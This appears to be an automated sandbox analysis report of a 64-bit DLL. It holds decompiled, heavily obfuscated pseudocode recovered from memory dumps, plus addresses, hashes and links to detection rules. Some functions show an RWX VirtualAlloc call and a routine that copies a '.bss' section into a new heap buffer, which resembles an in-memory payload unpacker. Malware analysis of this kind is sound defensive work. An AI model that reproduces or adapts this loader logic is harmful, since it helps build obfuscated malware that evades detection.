				if ( *(_t197 + 0x100) + 0xffffec15 - r8d >= 0) goto 0x130e6e2c;
				_t183 = __rdx[0x34];
				r8d = 0x3000;
				_t21 = _t186 + 0x40; // 0x40
				r9d = _t21;
				_t153 =  *((intOrPtr*)(_t183 + 0x50)) + 0x00000fff & 0xfffff000;
				__rdx[0x64] = _t153;
				VirtualAlloc(_t211, _t208); // executed
				__rdx[0x30] = _t183;
				goto 0x130e710b;
				r10d =  *__rdx;
				r8d = __rdx[0x50];
				r10d = r10d | _t153;
				r8d = r8d + __rdx[0x6c];
				r8d = r8d ^ 0x00002598;
				r10d = r10d +  *__rdx;
				 *(_t197 + 0x50) = __rdx[0x36] + __rdx[0x40] ^ 0x00003a59;
				 *((long long*)(_t197 + 0xe0)) = __rsi;
				r11d = r9d;
				r11d = r11d - __rdx[0x18];
				r11d = r11d + 0x38e9;
				r9d = r15d;
				 *(_t197 + 0x48) = __rdx[0x66] * r9d & r9d;
				r9d = r9d & _t176;
				 *(_t197 + 0x40) = r8d;
				 *(_t197 + 0x38) = r10d;
				r8d =  *(_t197 + 0xf0) + 0x00000d93 | __rdx[0x12];
				 *(_t197 + 0x30) = r11d;
				 *(_t197 + 0x28) = (__rdx[0x88] & r10d) - 0x38e9;
				 *(_t197 + 0x20) = __rdx[0x70] ^ _t153;
				_t112 = E00007FFC7FFC130E2A70(_t184, __rcx, __rdx, __r8, _t203);
				r9d = _t211 - 0x3666;
				r9d = r9d ^ 0x000037e1;
				r10d = __rdx[0x54];
				r10d = r10d + 0x343a;
				r11d = __rdx[0x48];
				r11d = r11d ^ 0x00001f2c;
				 *(_t197 + 0xf0) = _t112;
				r13d = r13d - r12d;
				r8d = _t194 - 0x37e1;
				 *(_t197 + 0x48) = __rdx[0x68] & __rdx[0x50] & 0x0000228c;
				 *(_t197 + 0x40) = __rdx;
				 *(_t197 + 0x38) = r10d;
				 *(_t197 + 0x30) = r11d;
				 *(_t197 + 0x28) = (__rdx[0x62] | __rdx[0x8a]) ^ _t176;
				 *(_t197 + 0x20) =  *__rdx ^ r13d ^ 0x00002598;
				r12d = E00007FFC7FFC130F98F0(r13d, _t183, __rdx, _t199, _t201, _t206);
				r15d = __rdx[0x32];
				_t117 = __rdx[0x62];
				r15d = r15d ^ __rdx[0x48];
				r13d = __rdx[0x6c];
				_t169 = __rdx[0x4c];
				_t202 =  *((intOrPtr*)(_t197 + 0xd8));
				r14d = __rdx[0x54];
				r14d = r14d | _t117;
				r8d =  *_t202;
				r8d = r8d + _t202[0x38];
				r11d = _t202[0x1e];
				r10d = _t202[0x8a];
				_t161 =  *(_t197 + 0xf0);
				r10d = r10d - 0x3666;
				r8d = r8d | _t161;
				r13d = r13d | 0x000027b2;
				r13d = r13d - _t202[0x24];
				_t189 =  *((intOrPtr*)(_t197 + 0xd8));
				r11d = r11d |  *(_t197 + 0x80);
				r11d = r11d +  *((intOrPtr*)(_t197 + 0xe8));
				 *(_t197 + 0x78) = r15d;
				 *(_t197 + 0x70) = r14d;
				 *(_t197 + 0x68) = _t186 + __rdx & _t202[0x16];
				 *((intOrPtr*)(_t197 + 0x60)) = _t202[0x44] + 0x38e9 + r13d;
				 *(_t197 + 0xf0) = _t117 ^  *(_t197 + 0x80);
				 *(_t197 + 0xd0) = ( *(_t197 + 0xd0) - _t161 + 0xea2) * _t169;
				r9d =  *(_t197 + 0x110);
				r12d =  *(_t197 + 0x100);
				r9d = r9d + 0xffffe749;
				r9d = r9d ^ _t169;
				r12d = r12d | 0x000038e9;
				r9d = r9d |  *( *((intOrPtr*)(_t197 + 0xd8)) + 0x100);
				 *(_t197 + 0x58) =  *(_t197 + 0xd0);
				 *(_t197 + 0x50) =  *(_t197 + 0x130) + _t202[0x72] ^ 0x0000343a;
				 *(_t197 + 0x48) = r11d;
				 *(_t197 + 0x40) = r10d;
				r10d =  *(_t197 + 0xf0);
				 *(_t197 + 0x38) = r10d;
				 *(_t197 + 0x30) = r13d;
				 *(_t197 + 0x28) = r8d;
				 *(_t197 + 0x20) = _t202[0x74] ^  *(_t197 + 0x130);
				E00007FFC7FFC130FA750(_t183, _t186,  *((intOrPtr*)(_t197 + 0xd8)), _t189, _t202);
				return  *((intOrPtr*)(_t197 + 0xe8)) + 0xffffeba5;
			}
























                                0x7ffc130e6d50
                                0x7ffc130e6d50
                                0x7ffc130e6d50
                                0x7ffc130e6d55
                                0x7ffc130e6d59
                                0x7ffc130e6d5a
                                0x7ffc130e6d5b
                                0x7ffc130e6d5e
                                0x7ffc130e6d64
                                0x7ffc130e6d78
                                0x7ffc130e6d89
                                0x7ffc130e6d93
                                0x7ffc130e6d9a
                                0x7ffc130e6da1
                                0x7ffc130e6da8
                                0x7ffc130e6dbb
                                0x7ffc130e6dc2
                                0x7ffc130e6dc9
                                0x7ffc130e6dd0
                                0x7ffc130e6dd7
                                0x7ffc130e6ddf
                                0x7ffc130e6de9
                                0x7ffc130e6deb
                                0x7ffc130e6df4
                                0x7ffc130e6dfd
                                0x7ffc130e6dfd
                                0x7ffc130e6e07
                                0x7ffc130e6e0d
                                0x7ffc130e6e14
                                0x7ffc130e6e1a
                                0x7ffc130e6e27
                                0x7ffc130e6e43
                                0x7ffc130e6e4c
                                0x7ffc130e6e53
                                0x7ffc130e6e56
                                0x7ffc130e6e64
                                0x7ffc130e6e6b
                                0x7ffc130e6e77
                                0x7ffc130e6e7b
                                0x7ffc130e6e98
                                0x7ffc130e6e9b
                                0x7ffc130e6ea9
                                0x7ffc130e6eb3
                                0x7ffc130e6eb6
                                0x7ffc130e6eba
                                0x7ffc130e6ebd
                                0x7ffc130e6ec5
                                0x7ffc130e6eca
                                0x7ffc130e6ecd
                                0x7ffc130e6ed2
                                0x7ffc130e6ed6
                                0x7ffc130e6eda
                                0x7ffc130e6ee6
                                0x7ffc130e6ef4
                                0x7ffc130e6efb
                                0x7ffc130e6f07
                                0x7ffc130e6f0e
                                0x7ffc130e6f1f
                                0x7ffc130e6f33
                                0x7ffc130e6f3a
                                0x7ffc130e6f5c
                                0x7ffc130e6f63
                                0x7ffc130e6f6a
                                0x7ffc130e6f6f
                                0x7ffc130e6f74
                                0x7ffc130e6f79
                                0x7ffc130e6f7d
                                0x7ffc130e6f8d
                                0x7ffc130e6f97
                                0x7ffc130e6f9e
                                0x7ffc130e6fa5
                                0x7ffc130e6fa8
                                0x7ffc130e6faf
                                0x7ffc130e6fb9
                                0x7ffc130e6fc1
                                0x7ffc130e6fc4
                                0x7ffc130e6fcb
                                0x7ffc130e6fce
                                0x7ffc130e6fdc
                                0x7ffc130e6fe6
                                0x7ffc130e6ff0
                                0x7ffc130e6ff7
                                0x7ffc130e7005
                                0x7ffc130e700f
                                0x7ffc130e7016
                                0x7ffc130e701f
                                0x7ffc130e702d
                                0x7ffc130e7035
                                0x7ffc130e7044
                                0x7ffc130e7049
                                0x7ffc130e704e
                                0x7ffc130e7052
                                0x7ffc130e7059
                                0x7ffc130e706e
                                0x7ffc130e708b
                                0x7ffc130e7096
                                0x7ffc130e709e
                                0x7ffc130e70a5
                                0x7ffc130e70a8
                                0x7ffc130e70af
                                0x7ffc130e70bd
                                0x7ffc130e70c1
                                0x7ffc130e70c5
                                0x7ffc130e70ca
                                0x7ffc130e70cf
                                0x7ffc130e70d7
                                0x7ffc130e70dc
                                0x7ffc130e70e1
                                0x7ffc130e70eb
                                0x7ffc130e70f2
                                0x7ffc130e711d

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                                • Instruction ID: 6a52ef302f8d0ada13a76ef666c9e59bc3bdeddbfdec42d790b2c44045eca038
                                • Opcode Fuzzy Hash: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                                • Instruction Fuzzy Hash: BE914AB36186D48BD325CF19E448B9EBBA4F788788F114129EF8957B58C738EA51CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E5840 Relevance: .2, Instructions: 238COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 59%
                                			E00007FFC7FFC130E5840(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, long long _a8, signed int _a24, intOrPtr _a32, long long _a40, intOrPtr _a48, signed int _a64, signed int _a80) {
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v88;
				intOrPtr _v96;
				signed int _v104;
				signed int _v112;
				signed int _v120;
				signed int _v128;
				signed int _v136;
				signed int _v144;
				signed int _v152;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				signed int _t132;
				intOrPtr _t139;
				signed int _t144;
				signed int _t148;
				signed int _t157;
				signed int _t174;
				intOrPtr _t176;
				signed int _t182;
				signed int _t183;
				void* _t194;
				void* _t197;
				long long _t216;
				long long _t241;
				void* _t242;
				void* _t243;
				void* _t247;
				void* _t251;
				void* _t253;
				void* _t254;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t258;

				_t251 = __r9;
				_t247 = __r8;
				_a8 = __rbx;
				r8d = r8d + 0xffffea1c;
				r12d = _a80;
				r12d = r12d + 0x3c4;
				_a48 = __r9 - 0x22c;
				_t182 = __rax - 0x27ae;
				_v64 = r8d;
				r9d = __rax - 0x6ab;
				_a24 = _t182;
				_a64 = r9d;
				r13d = __rcx + 0x18b7;
				r14d = __rcx - 0x2032;
				r15d = __rcx - 0x106;
				if (r13d - __rdx - 0x365 <= 0) goto 0x130e597a;
				_t177 = __r9 + 0xfd2;
				_v88 = _t242 + 0x3666;
				r10d = _t242 + 0x2598;
				r11d = _t257 + 0x3595;
				_t183 = _t182 + 0x37e1;
				r14d = r14d + 0x23f6;
				_v96 = _t256 - 0x760;
				_t154 = __r8 + 0x495;
				r8d = _a64;
				r9d = _t258 + 0x1b2d;
				_v104 = r10d;
				_v112 = r11d;
				_v120 = __r9 + 0x17e6;
				_v128 = __r9 + 0xfd2;
				_t241 = _a40;
				_v136 = _t183;
				_v144 = __r9 + 0x1492;
				_v152 = r14d;
				E00007FFC7FFC130E6D50(__r8 + 0x495, __rax, __rcx, _t241, _t242, __r8); // executed
				r8d =  *(_t241 + 0x190);
				E00007FFC7FFC130EC440(_t154, 0, _t177, _t194,  *((intOrPtr*)(_t241 + 0xc0)), _t241, _t241, _t247);
				goto 0x130e5ca3;
				_t216 = _a40;
				if ( *((intOrPtr*)(_t216 + 0x140)) -  *((intOrPtr*)(_t216 + 0x228)) - 0x37e1 >= 0) goto 0x130e59d0;
				_t197 = _t183 - r12d - r13d;
				if (_t197 > 0) goto 0x130e59d0;
				r8d = r12d;
				r8d = r8d & 0x00002032;
				asm("o16 nop [eax+eax]");
				if (_t197 != 0) goto 0x130e59c0;
				 *(_t216 + 0x1b0) =  *(_t216 + 0x1b0) - _t247;
				if ( *(_t216 + 0x1b0) -  *(_t216 + 0x1f0) * r12d > 0) goto 0x130e5c9c;
				_a32 = _t183;
				if (_t183 - r14d -  *((intOrPtr*)(_t216 + 0x120)) <= 0) goto 0x130e5c71;
				_t132 = _t251 + 0x2598;
				_a80 = _t132;
				if ( *_t216 - ( *(_t216 + 0x1c0) | _t132) <= 0) goto 0x130e5c4a;
				r11d = _t258 + _t257;
				r10d = r14d;
				r10d = r10d * r14d;
				_v72 = r15d & 0x00002032;
				_v68 = r12d & r13d;
				_v60 = r10d;
				r11d =  *(_t216 + 0x48);
				r9d =  *(_t216 + 0x188);
				r11d = r11d ^ r14d;
				r8d =  *(_t216 + 0x40);
				r11d = r11d + r14d;
				r10d = r10d - _a48;
				r9d = r9d *  *(_t216 + 0x1b0);
				_v104 =  *(_t216 + 0x90) | 0x00002598;
				r8d = r8d + r12d;
				_v112 =  *((intOrPtr*)(_t216 + 0x130)) + 0x2032;
				_v120 = r11d;
				_v128 = 0;
				_v136 =  *(_t216 + 0x1c0) ^ r11d;
				_v144 = r10d;
				_v152 =  *(_t216 + 0xa8) & 0x00000d20 | 0x0000120c;
				_t139 = E00007FFC7FFC130E2A70(_t216,  *(_t216 + 0x1c0) | _t132, _t216, _t132, _t253);
				_t157 = _a24;
				r9d =  *(_t216 + 0x10);
				r10d =  *(_t216 + 0x188);
				r9d = r9d | 0x00002103;
				r8d =  *(_t216 + 0x60);
				r9d = r9d + _t157;
				_a48 = _t139;
				r10d = r10d | 0x000027ae;
				r8d = r8d & _t157;
				_v120 = _a64 ^ 0x000027b2;
				_v128 = _v72;
				_v136 = _v68;
				_v144 = r10d;
				_v152 = r9d;
				_t144 = E00007FFC7FFC130E6820(_t216,  *(_t216 + 0x1c0) | _t132, _t216, _t243, _t216, _t253, _t254, _t255);
				r8d =  *(_t216 + 0x90);
				r8d = r8d ^ r15d;
				r9d =  *(_t216 + 0x1b8);
				r8d = r8d | r15d;
				r11d =  *(_t216 + 0x1a0);
				r11d = r11d + 0x27ae;
				r11d = r11d ^ 0x0000343a;
				_v112 =  *(_t216 + 0x188) * _v64;
				_a24 = _t144;
				r9d = r9d * r14d;
				_v120 = ( *(_t216 + 0x60) | r13d) ^  *(_t216 + 0x40);
				_v128 = r8d;
				_v136 = (r15d | r12d) ^ 0x000027ae;
				r9d = r9d ^ _a64;
				_v144 = r11d;
				_v152 =  *(_t216 + 0x40) * 0x00002598 ^  *(_t216 + 0x1f8);
				_t148 = E00007FFC7FFC130FF6B0(_t216,  *(_t216 + 0x1c0) | _t132, _t216, _t242, _t243, _t216, _t216, _t253);
				r11d = _t258 + _t257;
				_t174 = _a80 + 3;
				r10d = _v60;
				_a64 = _t148;
				_a80 = _t174;
				if (_t174 - ( *(_t216 + 0x1c0) | _t148 + 0x00002598) > 0) goto 0x130e5a70;
				_t176 = _a32 + 4;
				_a32 = _t176;
				if (_t176 - r14d -  *((intOrPtr*)(_t216 + 0x120)) > 0) goto 0x130e5a20;
				if (_a24 -  *(_t216 + 0x10) - 0x329d <= 0) goto 0x130e5c9c;
				 *(_t216 + 0x48) =  *(_t216 + 0x48) + ( *(_t216 + 0x150) | 0x0000343a) + r13d;
				return _t256 + 0x13da;
			}











































                                0x7ffc130e5840
                                0x7ffc130e5840
                                0x7ffc130e5840
                                0x7ffc130e586c
                                0x7ffc130e5873
                                0x7ffc130e587b
                                0x7ffc130e5882
                                0x7ffc130e5889
                                0x7ffc130e588f
                                0x7ffc130e5894
                                0x7ffc130e589b
                                0x7ffc130e58a8
                                0x7ffc130e58b0
                                0x7ffc130e58b7
                                0x7ffc130e58be
                                0x7ffc130e58c8
                                0x7ffc130e58ce
                                0x7ffc130e58db
                                0x7ffc130e58df
                                0x7ffc130e58e6
                                0x7ffc130e58ed
                                0x7ffc130e58fa
                                0x7ffc130e590f
                                0x7ffc130e5913
                                0x7ffc130e591a
                                0x7ffc130e5922
                                0x7ffc130e5929
                                0x7ffc130e592e
                                0x7ffc130e5933
                                0x7ffc130e5937
                                0x7ffc130e593b
                                0x7ffc130e5943
                                0x7ffc130e594a
                                0x7ffc130e594e
                                0x7ffc130e5953
                                0x7ffc130e5958
                                0x7ffc130e596a
                                0x7ffc130e5975
                                0x7ffc130e597a
                                0x7ffc130e5996
                                0x7ffc130e599e
                                0x7ffc130e59a0
                                0x7ffc130e59ab
                                0x7ffc130e59ae
                                0x7ffc130e59ba
                                0x7ffc130e59c7
                                0x7ffc130e59c9
                                0x7ffc130e59e5
                                0x7ffc130e59fa
                                0x7ffc130e5a04
                                0x7ffc130e5a0a
                                0x7ffc130e5a2d
                                0x7ffc130e5a37
                                0x7ffc130e5a40
                                0x7ffc130e5a49
                                0x7ffc130e5a4c
                                0x7ffc130e5a53
                                0x7ffc130e5a60
                                0x7ffc130e5a6a
                                0x7ffc130e5a8f
                                0x7ffc130e5a99
                                0x7ffc130e5aa0
                                0x7ffc130e5aae
                                0x7ffc130e5ab2
                                0x7ffc130e5ab5
                                0x7ffc130e5ac3
                                0x7ffc130e5ad1
                                0x7ffc130e5ad5
                                0x7ffc130e5ad8
                                0x7ffc130e5adf
                                0x7ffc130e5ae4
                                0x7ffc130e5aec
                                0x7ffc130e5af0
                                0x7ffc130e5af5
                                0x7ffc130e5af9
                                0x7ffc130e5afe
                                0x7ffc130e5b05
                                0x7ffc130e5b09
                                0x7ffc130e5b10
                                0x7ffc130e5b17
                                0x7ffc130e5b1b
                                0x7ffc130e5b1e
                                0x7ffc130e5b2f
                                0x7ffc130e5b3b
                                0x7ffc130e5b3e
                                0x7ffc130e5b4c
                                0x7ffc130e5b54
                                0x7ffc130e5b58
                                0x7ffc130e5b5d
                                0x7ffc130e5b65
                                0x7ffc130e5b72
                                0x7ffc130e5b7e
                                0x7ffc130e5b81
                                0x7ffc130e5b88
                                0x7ffc130e5b92
                                0x7ffc130e5b9f
                                0x7ffc130e5bad
                                0x7ffc130e5bc6
                                0x7ffc130e5bca
                                0x7ffc130e5bd7
                                0x7ffc130e5bde
                                0x7ffc130e5be2
                                0x7ffc130e5bea
                                0x7ffc130e5bee
                                0x7ffc130e5bf6
                                0x7ffc130e5bfb
                                0x7ffc130e5bff
                                0x7ffc130e5c0b
                                0x7ffc130e5c16
                                0x7ffc130e5c19
                                0x7ffc130e5c1e
                                0x7ffc130e5c33
                                0x7ffc130e5c3d
                                0x7ffc130e5c4a
                                0x7ffc130e5c5a
                                0x7ffc130e5c64
                                0x7ffc130e5c82
                                0x7ffc130e5c98
                                0x7ffc130e5cbd

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 89a4817951f1a13eee29f1b2b0a9b082e15d1f6d6768b930f3d990648e2eeefa
                                • Instruction ID: 430cfcb0d18a56a132fe9c6796830629c4d45471cbb6bd9b00af134c3236fcd6
                                • Opcode Fuzzy Hash: 89a4817951f1a13eee29f1b2b0a9b082e15d1f6d6768b930f3d990648e2eeefa
                                • Instruction Fuzzy Hash: DDB19B736186D5CBD720CF24E044BAABBA4F788B88F144536DB8967B58DB38E954CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EB3A0 Relevance: 18.1, APIs: 12, Instructions: 133COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 7ffc130eb3a0-7ffc130eb3a6 1 7ffc130eb3a8-7ffc130eb3ab 0->1 2 7ffc130eb3e1-7ffc130eb538 0->2 4 7ffc130eb3d5-7ffc130eb414 call 7ffc130eb89c 1->4 5 7ffc130eb3ad-7ffc130eb3b0 1->5 6 7ffc130eb53a-7ffc130eb53c 2->6 7 7ffc130eb53e-7ffc130eb559 call 7ffc130eb72c 2->7 23 7ffc130eb416-7ffc130eb418 4->23 24 7ffc130eb41d-7ffc130eb432 call 7ffc130eb72c 4->24 9 7ffc130eb3c8 __scrt_dllmain_crt_thread_attach 5->9 10 7ffc130eb3b2-7ffc130eb3b5 5->10 12 7ffc130eb58e-7ffc130eb59d 6->12 21 7ffc130eb55b-7ffc130eb560 call 7ffc130ebc0c 7->21 22 7ffc130eb565-7ffc130eb58c call 7ffc130eb858 call 7ffc130eb888 call 7ffc130eba50 call 7ffc130eba74 7->22 11 7ffc130eb3cd-7ffc130eb3d4 9->11 15 7ffc130eb3b7-7ffc130eb3c0 10->15 16 7ffc130eb3c1-7ffc130eb3c6 call 7ffc130eb7dc 10->16 16->11 21->22 22->12 27 7ffc130eb505-7ffc130eb51a 23->27 32 7ffc130eb434-7ffc130eb439 call 7ffc130ebc0c 24->32 33 7ffc130eb43e-7ffc130eb44f call 7ffc130eb79c 24->33 32->33 39 7ffc130eb4b8-7ffc130eb4c2 call 7ffc130eba50 33->39 40 7ffc130eb451-7ffc130eb48d call 7ffc130ebd54 call 7ffc130ebaf0 call 7ffc130ebbb4 call 7ffc130ebaf0 call 7ffc130ebbe0 call 7ffc130ed0c8 33->40 39->23 49 7ffc130eb4c8-7ffc130eb4d4 call 7ffc130ebbfc 39->49 40->39 68 7ffc130eb48f-7ffc130eb496 __scrt_dllmain_after_initialize_c 40->68 55 7ffc130eb4fa-7ffc130eb500 49->55 56 7ffc130eb4d6-7ffc130eb4e0 call 7ffc130eb9b4 49->56 55->27 56->55 62 7ffc130eb4e2-7ffc130eb4f5 call 7ffc130ebdec 56->62 62->55 68->39 69 7ffc130eb498-7ffc130eb4b5 call 7ffc130ed050 68->69 69->39
                                C-Code - Quality: 100%
                                			E00007FFC7FFC130EB3A0(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x130eb3e1;
				if (_t5 == 0) goto 0x130eb3d5;
				if (_t5 == 0) goto 0x130eb3c8;
				if (__edx == 1) goto 0x130eb3c1;
				return 1;
			}




                                0x7ffc130eb3a4
                                0x7ffc130eb3a6
                                0x7ffc130eb3ab
                                0x7ffc130eb3b0
                                0x7ffc130eb3b5
                                0x7ffc130eb3c0

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                • String ID:
                                • API String ID: 3885183344-0
                                • Opcode ID: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction ID: 16b6b08da8b7b05c29702a84e49a71bc7655186e0b7c35f39b35c38ddf256081
                                • Opcode Fuzzy Hash: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction Fuzzy Hash: 39519E21F0CE6F85FA24AB66A4422B926E0AF543ACF644031E54D377E7DE2CE465C734
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C4DB4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 48%
                                			E00000201201640C4DB4(long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r9, void* __r11) {
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t30;
				long long _t55;
				void* _t71;
				intOrPtr* _t74;
				intOrPtr* _t75;
				long long _t81;
				long long _t82;
				long long _t84;
				void* _t90;
				long _t92;
				long _t94;
				long _t96;

				_t90 = __r9;
				_t55 = _t84;
				 *((long long*)(_t55 + 8)) = __rbx;
				 *((long long*)(_t55 + 0x10)) = _t81;
				 *((long long*)(_t55 + 0x18)) = __rsi;
				 *((long long*)(_t55 + 0x20)) = __rdi;
				_t82 = __rcx;
				r8d = 0;
				HeapCreate(_t96, _t94, _t92); // executed
				if (_t55 == 0) goto 0x640c4f03;
				_t71 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
				_t74 = _t55 + _t71 + 0x68;
				_t22 =  *_t74;
				if (_t22 == 0) goto 0x640c4e94;
				if (_t22 == 0x7373622e) goto 0x640c4e22;
				_t75 = _t74 + 0x28;
				_t23 =  *_t75;
				if (_t23 != 0) goto 0x640c4e11;
				if (_t23 == 0) goto 0x640c4e94;
				r13d =  *(_t75 + 0x10);
				r12d =  *(_t75 + 0x14);
				r12d = r12d ^  *(_t71 + 8);
				r12d = r12d ^ r13d;
				HeapAlloc(??, ??, ??);
				if (_t55 == 0) goto 0x640c4e8d;
				r9d = r12d;
				r8d = r13d;
				E00000201201640C111C(_t55, _t55, __rbx, _t55, _t71 + __rcx);
				r11d =  *((intOrPtr*)(_t75 + 0xc));
				 *0x640cd448 = _t55 - __r11 - _t82;
				 *0x640cd450 = E00000201201640C16FC(_t55, _t55 - __r11 - _t82 + 0x640d1040);
				goto 0x640c4e99;
				goto 0x640c4e99;
				if (2 == 0) goto 0x640c4ea8;
				HeapDestroy(??);
				goto 0x640c4f03;
				HeapAlloc(??, ??, ??);
				if (0x640d1040 != 0) goto 0x640c4ee1;
				HeapDestroy(??);
				goto 0x640c4f03;
				E00000201201640C487A();
				 *0x201640D1048 = _t55;
				 *0x640cd458 = 0x640d1040; // executed
				_t30 = E00000201201640C37E0(0x640d1040, _t82, _t90); // executed
				return _t30;
			}

















                                0x201640c4db4
                                0x201640c4db4
                                0x201640c4db7
                                0x201640c4dbb
                                0x201640c4dbf
                                0x201640c4dc3
                                0x201640c4dd1
                                0x201640c4dd4
                                0x201640c4de3
                                0x201640c4def
                                0x201640c4dfb
                                0x201640c4e02
                                0x201640c4e07
                                0x201640c4e0b
                                0x201640c4e16
                                0x201640c4e18
                                0x201640c4e1c
                                0x201640c4e20
                                0x201640c4e24
                                0x201640c4e26
                                0x201640c4e2a
                                0x201640c4e31
                                0x201640c4e3a
                                0x201640c4e3d
                                0x201640c4e49
                                0x201640c4e4e
                                0x201640c4e51
                                0x201640c4e5a
                                0x201640c4e5f
                                0x201640c4e75
                                0x201640c4e85
                                0x201640c4e8b
                                0x201640c4e92
                                0x201640c4e9b
                                0x201640c4ea0
                                0x201640c4ea6
                                0x201640c4ec3
                                0x201640c4ecf
                                0x201640c4ed4
                                0x201640c4edf
                                0x201640c4ee9
                                0x201640c4eee
                                0x201640c4ef5
                                0x201640c4efc
                                0x201640c4f23

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$AllocDestroy$Create
                                • String ID: .bss
                                • API String ID: 388876957-3890483948
                                • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction ID: 5062e316b5a0475a1b40b4a6314e4781af67b9c39a31fccc1009d8affa039997
                                • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction Fuzzy Hash: F441AD31304760D7EB14CB52AD4A39967A8F788B94F158024EF4947B8ADF79E866C308
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F7C20 Relevance: 7.7, APIs: 5, Instructions: 219memoryfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 35%
                                			E00007FFC7FFC130F7C20(long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, signed int __r9) {
				void* __rdi;
				signed int _t150;
				void* _t153;
				signed int _t154;
				void* _t156;
				signed int _t157;
				signed long long _t192;
				signed long long _t210;
				signed long long _t228;
				void* _t229;
				intOrPtr _t230;
				long long _t234;
				long long* _t235;
				void* _t237;
				void* _t238;
				signed long long _t242;
				intOrPtr* _t248;
				signed long long _t250;
				signed int _t251;
				void* _t252;
				long _t254;
				void* _t256;
				long _t258;
				void* _t260;

				_t252 = _t237;
				 *((long long*)(_t252 + 8)) = __rbx;
				 *((long long*)(_t252 + 0x10)) = _t234;
				 *((long long*)(_t252 + 0x18)) = __rsi;
				_t238 = _t237 - 0x60;
